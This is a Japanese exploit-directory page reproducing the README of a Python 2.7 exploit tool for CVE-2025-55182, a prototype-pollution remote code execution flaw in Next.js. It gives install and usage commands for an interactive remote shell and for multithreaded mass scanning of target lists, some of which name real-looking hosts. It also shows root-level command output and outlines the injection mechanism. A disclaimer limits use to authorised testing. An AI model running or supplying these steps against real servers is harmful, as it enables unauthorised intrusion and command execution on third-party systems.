Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182-React2shell — CVE-2025-55182 エクスプロイトツール – Next.js のプロトタイプ汚染による RCE につながる Python 2.7 エクスプロイト | Kitploit
ツール/GitHubGitHub/jenderal92/cve-2025-55182-react2shell
脆弱性スキャナーペイロード生成エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubjenderal92/cve-2025-55182-react2shell

CVE-2025-55182-React2shell

CVE-2025-55182 エクスプロイトツール – Next.js のプロトタイプ汚染による RCE につながる Python 2.7 エクスプロイト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
612ヶ月前未レビュー

CVE-2025-55182 - React2shell

CVE-2025-55182 を悪用する Python 2.7 エクスプロイト - Next.js アプリケーションにおける重大なプロトタイプ汚染 / RCE 脆弱性です。
このツールは、単一ターゲットのインタラクティブシェル と、マルチスレッド、カラー出力、自動 HTTPS フォールバックを備えた複数ホストの 一括スキャン の両方をサポートします。


🚀 機能

  • ✅ インタラクティブシェル – 単一ターゲットに対して任意のシステムコマンドを実行
  • ✅ 一括スキャン – ファイルリストからマルチスレッドで高速実行、結果は自動保存
  • ✅ 自動検出 – 単一URL → シェルモード、既存ファイル → 一括スキャンモード
  • ✅ 自動 HTTPS – プロトコル指定がない場合に https:// を自動追加
  • ✅ スレッドセーフなファイル書き込み – 脆弱な結果をリアルタイムで保存
  • ✅ カスタムコマンド – デフォルトの id を任意のコマンド (whoami、ls など) に変更可能
  • ✅ 外部依存関係なし – requests のみ (簡単にインストール可能)

📋 必要条件

  • Python 2.7 (このツールは Python 2.7 向けに作成されています)
  • requests ライブラリ – 以下のコマンドでインストール:
    root@kitploit:~
    pip install requests
    

  • ANSI カラーに対応したターミナル (ほとんどの Linux/macOS ターミナル、Windows Terminal、PowerShell)

📦 インストール

root@kitploit:~
git clone https://github.com/Jenderal92/cve-2025-55182.git
cd CVE-2025-55182
pip install requests

スクリプトに実行権限を付与 (オプション):

root@kitploit:~
chmod +x CVE-2025-55182.py

🎯 使い方

1. インタラクティブシェル (単一ターゲット)

root@kitploit:~
python2 CVE-2025-55182.py https://target.com

またはプロトコルなし (HTTPS が自動追加されます):

root@kitploit:~
python2 CVE-2025-55182.py target.com

接続され、脆弱性が確認されると、シェルプロンプトが表示されます:

root@kitploit:~
$ id
uid=0(root) gid=0(root) groups=0(root)

$ whoami
root

$ ls -la
...

組み込みコマンド:

  • exit / quit – シェルを閉じる
  • clear – 画面をクリア
  • help – ヘルプを表示

2. 一括スキャン (ターゲットリスト)

1行に1ターゲットを記述したファイルを用意します (http/https の有無は問いません):

targets.txt

root@kitploit:~
app-site3.htface.tech
https://example.com
http://127.0.0.1:3000
vulnerable-site.org

一括スキャンを実行 (デフォルト: 10スレッド、コマンド id、出力 res.txt):

root@kitploit:~
python2 CVE-2025-55182.py targets.txt

スレッド数、コマンド、出力ファイルをカスタマイズ:

root@kitploit:~
python2 CVE-2025-55182.py targets.txt 20 "whoami" results.txt
  • 20 – スレッド数
  • whoami – 脆弱な各ターゲットで実行するコマンド
  • results.txt – 出力ファイル (脆弱なエントリのみ保存)

一括スキャンの出力例:

root@kitploit:~
[INFO] Loaded 4 URLs
[INFO] Threads: 10, Command: 'id', Output: res.txt

[*] (1/4) Checking: https://site.com
[+] VULNERABLE: https://site.com
    Status: 303
    Output: uid=0(root) gid=0(root) groups=0(root)

[-] NOT VULNERABLE: https://example.com
...

保存された結果 (res.txt):

root@kitploit:~
domain : https://site.com
cmd : uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------

🧪 仕組み

このエクスプロイトは、細工された multipart/form-data リクエストを Next.js のエンドポイント (パスが空の場合は /login が追加されます) に送信します。 プロトタイプ汚染 (__proto__:then と constructor:constructor) を悪用して、child_process.execSync() を使用してシステムコマンドを実行する悪意のあるプレフィックスを注入します。

サーバーは x-action-redirect ヘッダー (または Location) にコマンド出力を含む 303 リダイレクトで応答します。ツールは /login?a=<output> から結果を抽出します。


🛡️ 免責事項

このツールは教育目的および許可されたセキュリティテスト専用です。 コンピュータシステムへの不正アクセスは違法です。著者は、本ソフトウェアの誤用または損害について一切の責任を負いません。 このエクスプロイトを使用する前に、ターゲットシステムの所有者から明示的な書面による許可を得る必要があります。

詳細な免責事項は Jenderal92 のカバーに記載されています。こちら で確認できます。

ツールをダウンロード